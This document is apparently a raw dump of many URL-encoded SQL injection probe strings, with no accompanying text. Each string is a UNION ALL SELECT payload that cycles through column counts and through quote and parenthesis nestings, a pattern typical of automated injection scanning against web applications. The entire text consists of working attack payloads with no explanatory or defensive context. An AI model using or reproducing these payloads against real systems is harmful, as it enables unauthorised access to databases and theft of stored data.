-4460%27%29%29%29%20UNION%20ALL%20SELECT%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478--%20%20AND%20%28%28%28%27UjOJ%27%20LIKE%20%27UjOJ -6725%27%20UNION%20ALL%20SELECT%205041%2C%205041%2C%205041%2C%205041%2C%205041%2C%205041%2C%205041%2C%205041%2C%205041%2C%205041%2C%205041--%20%20AND%20%27PzVT%27%20LIKE%20%27PzVT -7965%27%20UNION%20ALL%20SELECT%201251%2C%201251%2C%201251%2C%201251%2C%201251%2C%201251%2C%201251%2C%201251%2C%201251%2C%201251%2C%201251%2C%201251--%20%20AND%20%27Dhdk%27%20LIKE%20%27Dhdk -5963%27%20UNION%20ALL%20SELECT%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126--%20%20AND%20%27gFrp%27%20LIKE%20%27gFrp -9457%27%20UNION%20ALL%20SELECT%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504--%20%20AND%20%27eJVh%27%20LIKE%20%27eJVh -4353%27%20UNION%20ALL%20SELECT%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447%2C%204447--%20%20AND%20%27kzbf%27%20LIKE%20%27kzbf -6611%27%20UNION%20ALL%20SELECT%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425%2C%203425--%20%20AND%20%27WnWb%27%20LIKE%20%27WnWb -9980%27%20UNION%20ALL%20SELECT%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149%2C%203149--%20%20AND%20%27FDHb%27%20LIKE%20%27FDHb -4253%27%20UNION%20ALL%20SELECT%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617%2C%204617--%20%20AND%20%27GTmE%27%20LIKE%20%27GTmE -8247%27%20UNION%20ALL%20SELECT%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218--%20%20AND%20%27HpgJ%27%20LIKE%20%27HpgJ -7762%27%20UNION%20ALL%20SELECT%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444--%20%20AND%20%27gneA%27%20LIKE%20%27gneA -3596%22%29%20UNION%20ALL%20SELECT%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113--%20%20AND%20%28%22ORFk%22%3D%22ORFk -3726%22%29%20UNION%20ALL%20SELECT%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442--%20%20AND%20%28%22XLjY%22%3D%22XLjY -8440%22%29%20UNION%20ALL%20SELECT%202435%2C%202435%2C%202435%2C%202435%2C%202435%2C%202435%2C%202435%2C%202435%2C%202435%2C%202435%2C%202435%2C%202435%2C%202435--%20%20AND%20%28%22bfLu%22%3D%22bfLu -1371%22%29%20UNION%20ALL%20SELECT%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939--%20%20AND%20%28%22SFyu%22%3D%22SFyu -9811%22%29%20UNION%20ALL%20SELECT%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762--%20%20AND%20%28%22objE%22%3D%22objE -4617%22%29%20UNION%20ALL%20SELECT%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665%2C%203665--%20%20AND%20%28%22YJoY%22%3D%22YJoY -7391%22%29%20UNION%20ALL%20SELECT%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322--%20%20AND%20%28%22bwaw%22%3D%22bwaw -7281%22%29%20UNION%20ALL%20SELECT%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030--%20%20AND%20%28%22Ajdp%22%3D%22Ajdp -1812%22%29%20UNION%20ALL%20SELECT%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393--%20%20AND%20%28%22GcES%22%3D%22GcES -2245%22%29%20UNION%20ALL%20SELECT%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863%2C%207863--%20%20AND%20%28%22BQtX%22%3D%22BQtX -3503%22%29%29%20UNION%20ALL%20SELECT%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537--%20%20AND%20%28%28%22mbod%22%3D%22mbod -4273%22%29%29%20UNION%20ALL%20SELECT%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834--%20%20AND%20%28%28%22yhEs%22%3D%22yhEs -5612%22%29%29%20UNION%20ALL%20SELECT%203813%2C%203813%2C%203813%2C%203813%2C%203813%2C%203813%2C%203813%2C%203813%2C%203813%2C%203813%2C%203813%2C%203813%2C%203813--%20%20AND%20%28%28%22wmhj%22%3D%22wmhj -9305%22%29%29%20UNION%20ALL%20SELECT%203162%2C%203162%2C%203162%2C%203162%2C%203162%2C%203162%2C%203162%2C%203162%2C%203162%2C%203162%2C%203162%2C%203162%2C%203162%2C%203162--%20%20AND%20%28%28%22VlKX%22%3D%22VlKX -3955%22%29%29%20UNION%20ALL%20SELECT%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994--%20%20AND%20%28%28%22IdBV%22%3D%22IdBV -2998%22%29%29%20UNION%20ALL%20SELECT%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518--%20%20AND%20%28%28%22mjpp%22%3D%22mjpp -1610%22%29%29%20UNION%20ALL%20SELECT%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963%2C%207963--%20%20AND%20%28%28%22EcKV%22%3D%22EcKV -5273%22%29%29%20UNION%20ALL%20SELECT%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081--%20%20AND%20%28%28%22Xgag%22%3D%22Xgag -9289%22%29%29%20UNION%20ALL%20SELECT%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375%2C%209375--%20%20AND%20%28%28%22VWeS%22%3D%22VWeS -4121%22%29%29%20UNION%20ALL%20SELECT%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920--%20%20AND%20%28%28%22bwAn%22%3D%22bwAn -3728%22%29%29%29%20UNION%20ALL%20SELECT%209595%2C%209595%2C%209595%2C%209595%2C%209595%2C%209595%2C%209595%2C%209595%2C%209595%2C%209595%2C%209595--%20%20AND%20%28%28%28%22ukSQ%22%3D%22ukSQ -9475%22%29%29%29%20UNION%20ALL%20SELECT%205842%2C%205842%2C%205842%2C%205842%2C%205842%2C%205842%2C%205842%2C%205842%2C%205842%2C%205842%2C%205842%2C%205842--%20%20AND%20%28%28%28%22vAgO%22%3D%22vAgO -6917%22%29%29%29%20UNION%20ALL%20SELECT%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587--%20%20AND%20%28%28%28%22smwk%22%3D%22smwk -1940%22%29%29%29%20UNION%20ALL%20SELECT%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057--%20%20AND%20%28%28%28%22UIQm%22%3D%22UIQm -1969%22%29%29%29%20UNION%20ALL%20SELECT%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300--%20%20AND%20%28%28%28%22Rvgi%22%3D%22Rvgi -5125%22%29%29%29%20UNION%20ALL%20SELECT%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359%2C%205359--%20%20AND%20%28%28%28%22rSCc%22%3D%22rSCc -5419%22%29%29%29%20UNION%20ALL%20SELECT%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628--%20%20AND%20%28%28%28%22dOrg%22%3D%22dOrg -1374%22%29%29%29%20UNION%20ALL%20SELECT%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156%2C%209156--%20%20AND%20%28%28%28%22wfsP%22%3D%22wfsP -6718%22%29%29%29%20UNION%20ALL%20SELECT%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874--%20%20AND%20%28%28%28%22RMxj%22%3D%22RMxj -3403%22%29%29%29%20UNION%20ALL%20SELECT%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805%2C%205805--%20%20AND%20%28%28%28%22aUBk%22%3D%22aUBk -6812%22%20UNION%20ALL%20SELECT%205725%2C%205725%2C%205725%2C%205725%2C%205725%2C%205725%2C%205725%2C%205725%2C%205725%2C%205725%2C%205725--%20%20AND%20%22YbvJ%22%3D%22YbvJ -8975%22%20UNION%20ALL%20SELECT%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927--%20%20AND%20%22PnIR%22%3D%22PnIR -2867%22%20UNION%20ALL%20SELECT%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308--%20%20AND%20%22sBMu%22%3D%22sBMu -5675%22%20UNION%20ALL%20SELECT%204718%2C%204718%2C%204718%2C%204718%2C%204718%2C%204718%2C%204718%2C%204718%2C%204718%2C%204718%2C%204718%2C%204718%2C%204718%2C%204718--%20%20AND%20%22yyrn%22%3D%22yyrn -4510%22%20UNION%20ALL%20SELECT%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100%2C%202100--%20%20AND%20%22oSaZ%22%3D%22oSaZ -8814%22%20UNION%20ALL%20SELECT%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583%2C%205583--%20%20AND%20%22owxn%22%3D%22owxn -1129%22%20UNION%20ALL%20SELECT%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613--%20%20AND%20%22eIgr%22%3D%22eIgr -4050%22%20UNION%20ALL%20SELECT%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610--%20%20AND%20%22IDru%22%3D%22IDru -7793%22%20UNION%20ALL%20SELECT%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307%2C%202307--%20%20AND%20%22wGHZ%22%3D%22wGHZ -5501%22%20UNION%20ALL%20SELECT%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101--%20%20AND%20%22bqnW%22%3D%22bqnW -7018%22%29%20UNION%20ALL%20SELECT%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382--%20%20AND%20%28%22FrTB%22%20LIKE%20%22FrTB -2821%22%29%20UNION%20ALL%20SELECT%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017--%20%20AND%20%28%22cktU%22%20LIKE%20%22cktU -6689%22%29%20UNION%20ALL%20SELECT%206235%2C%206235%2C%206235%2C%206235%2C%206235%2C%206235%2C%206235%2C%206235%2C%206235%2C%206235%2C%206235%2C%206235%2C%206235--%20%20AND%20%28%22THku%22%20LIKE%20%22THku -9453%22%29%20UNION%20ALL%20SELECT%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048--%20%20AND%20%28%22vHZB%22%20LIKE%20%22vHZB -1954%22%29%20UNION%20ALL%20SELECT%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799--%20%20AND%20%28%22hdWY%22%20LIKE%20%22hdWY -3654%22%29%20UNION%20ALL%20SELECT%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025--%20%20AND%20%28%22gFqe%22%20LIKE%20%22gFqe -5047%22%29%20UNION%20ALL%20SELECT%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086--%20%20AND%20%28%22eXdV%22%20LIKE%20%22eXdV -6361%22%29%20UNION%20ALL%20SELECT%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335%2C%204335--%20%20AND%20%28%22VHSd%22%20LIKE%20%22VHSd -1528%22%29%20UNION%20ALL%20SELECT%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362--%20%20AND%20%28%22pgbX%22%20LIKE%20%22pgbX -1878%22%29%20UNION%20ALL%20SELECT%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280%2C%208280--%20%20AND%20%28%22qCFj%22%20LIKE%20%22qCFj -3258%22%29%29%20UNION%20ALL%20SELECT%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647--%20%20AND%20%28%28%22mLGn%22%20LIKE%20%22mLGn -1605%22%29%29%20UNION%20ALL%20SELECT%202647%2C%202647%2C%202647%2C%202647%2C%202647%2C%202647%2C%202647%2C%202647%2C%202647%2C%202647%2C%202647%2C%202647--%20%20AND%20%28%28%22Iitv%22%20LIKE%20%22Iitv -4368%22%29%29%20UNION%20ALL%20SELECT%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455--%20%20AND%20%28%28%22ilui%22%20LIKE%20%22ilui -1448%22%29%29%20UNION%20ALL%20SELECT%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186--%20%20AND%20%28%28%22XGaq%22%20LIKE%20%22XGaq -9663%22%29%29%20UNION%20ALL%20SELECT%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768--%20%20AND%20%28%28%22ikNo%22%20LIKE%20%22ikNo -7801%22%29%29%20UNION%20ALL%20SELECT%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142--%20%20AND%20%28%28%22ZgEg%22%20LIKE%20%22ZgEg -6844%22%29%29%20UNION%20ALL%20SELECT%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197--%20%20AND%20%28%28%22OvFS%22%20LIKE%20%22OvFS -3583%22%29%29%20UNION%20ALL%20SELECT%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996%2C%206996--%20%20AND%20%28%28%22mlQD%22%20LIKE%20%22mlQD -3453%22%29%29%20UNION%20ALL%20SELECT%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347--%20%20AND%20%28%28%22aoZs%22%20LIKE%20%22aoZs -8453%22%29%29%20UNION%20ALL%20SELECT%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626%2C%208626--%20%20AND%20%28%28%22YyqR%22%20LIKE%20%22YyqR -3788%22%29%29%29%20UNION%20ALL%20SELECT%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495--%20%20AND%20%28%28%28%22YKbn%22%20LIKE%20%22YKbn -1783%22%29%29%29%20UNION%20ALL%20SELECT%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417--%20%20AND%20%28%28%28%22QbZU%22%20LIKE%20%22QbZU -4801%22%29%29%29%20UNION%20ALL%20SELECT%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753--%20%20AND%20%28%28%28%22yGTv%22%20LIKE%20%22yGTv -1140%22%29%29%29%20UNION%20ALL%20SELECT%208237%2C%208237%2C%208237%2C%208237%2C%208237%2C%208237%2C%208237%2C%208237%2C%208237%2C%208237%2C%208237%2C%208237%2C%208237%2C%208237--%20%20AND%20%28%28%28%22RAFu%22%20LIKE%20%22RAFu -7124%22%29%29%29%20UNION%20ALL%20SELECT%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684%2C%202684--%20%20AND%20%28%28%28%22ZiFR%22%20LIKE%20%22ZiFR -8312%22%29%29%29%20UNION%20ALL%20SELECT%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307%2C%201307--%20%20AND%20%28%28%28%22VjFU%22%20LIKE%20%22VjFU -6839%22%29%29%29%20UNION%20ALL%20SELECT%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998%2C%204998--%20%20AND%20%28%28%28%22kMRZ%22%20LIKE%20%22kMRZ -1789%22%29%29%29%20UNION%20ALL%20SELECT%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385--%20%20AND%20%28%28%28%22LaqZ%22%20LIKE%20%22LaqZ -9007%22%29%29%29%20UNION%20ALL%20SELECT%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546%2C%207546--%20%20AND%20%28%28%28%22UXbE%22%20LIKE%20%22UXbE -7006%22%29%29%29%20UNION%20ALL%20SELECT%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506%2C%203506--%20%20AND%20%28%28%28%22CxgY%22%20LIKE%20%22CxgY -6623%22%20UNION%20ALL%20SELECT%206439%2C%206439%2C%206439%2C%206439%2C%206439%2C%206439%2C%206439%2C%206439%2C%206439%2C%206439%2C%206439--%20%20AND%20%22RjGu%22%20LIKE%20%22RjGu -7316%22%20UNION%20ALL%20SELECT%206032%2C%206032%2C%206032%2C%206032%2C%206032%2C%206032%2C%206032%2C%206032%2C%206032%2C%206032%2C%206032%2C%206032--%20%20AND%20%22PYqs%22%20LIKE%20%22PYqs -1405%22%20UNION%20ALL%20SELECT%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489--%20%20AND%20%22EAed%22%20LIKE%20%22EAed -4544%22%20UNION%20ALL%20SELECT%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575--%20%20AND%20%22dXmq%22%20LIKE%20%22dXmq -2198%22%20UNION%20ALL%20SELECT%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858%2C%208858--%20%20AND%20%22Ofvq%22%20LIKE%20%22Ofvq -6419%22%20UNION%20ALL%20SELECT%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956--%20%20AND%20%22VhOF%22%20LIKE%20%22VhOF -3888%22%20UNION%20ALL%20SELECT%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431--%20%20AND%20%22XIES%22%20LIKE%20%22XIES -4910%22%20UNION%20ALL%20SELECT%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888--%20%20AND%20%22TqFW%22%20LIKE%20%22TqFW -7660%22%20UNION%20ALL%20SELECT%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238--%20%20AND%20%22qdzj%22%20LIKE%20%22qdzj -6274%22%20UNION%20ALL%20SELECT%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958--%20%20AND%20%22yphY%22%20LIKE%20%22yphY -5427%29%20WHERE%209234%3D9234%20UNION%20ALL%20SELECT%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234--%20 -9923%29%20WHERE%207247%3D7247%20UNION%20ALL%20SELECT%207247%2C%207247%2C%207247%2C%207247%2C%207247%2C%207247%2C%207247%2C%207247%2C%207247%2C%207247%2C%207247%2C%207247--%20 -1470%29%20WHERE%209539%3D9539%20UNION%20ALL%20SELECT%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539--%20 -5722%29%20WHERE%207031%3D7031%20UNION%20ALL%20SELECT%207031%2C%207031%2C%207031%2C%207031%2C%207031%2C%207031%2C%207031%2C%207031%2C%207031%2C%207031%2C%207031%2C%207031%2C%207031%2C%207031--%20 -4852%29%20WHERE%204499%3D4499%20UNION%20ALL%20SELECT%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499%2C%204499--%20 -9605%29%20WHERE%205217%3D5217%20UNION%20ALL%20SELECT%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217--%20 -4565%29%20WHERE%209771%3D9771%20UNION%20ALL%20SELECT%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771--%20 -5751%29%20WHERE%205343%3D5343%20UNION%20ALL%20SELECT%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343%2C%205343--%20 -6582%29%20WHERE%207430%3D7430%20UNION%20ALL%20SELECT%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430%2C%207430--%20 -8248%29%20WHERE%201657%3D1657%20UNION%20ALL%20SELECT%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657--%20 -8027%27%29%20WHERE%207998%3D7998%20UNION%20ALL%20SELECT%207998%2C%207998%2C%207998%2C%207998%2C%207998%2C%207998%2C%207998%2C%207998%2C%207998%2C%207998%2C%207998--%20 -8175%27%29%20WHERE%203677%3D3677%20UNION%20ALL%20SELECT%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677--%20 -1757%27%29%20WHERE%201191%3D1191%20UNION%20ALL%20SELECT%201191%2C%201191%2C%201191%2C%201191%2C%201191%2C%201191%2C%201191%2C%201191%2C%201191%2C%201191%2C%201191%2C%201191%2C%201191--%20 -6173%27%29%20WHERE%204389%3D4389%20UNION%20ALL%20SELECT%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389--%20 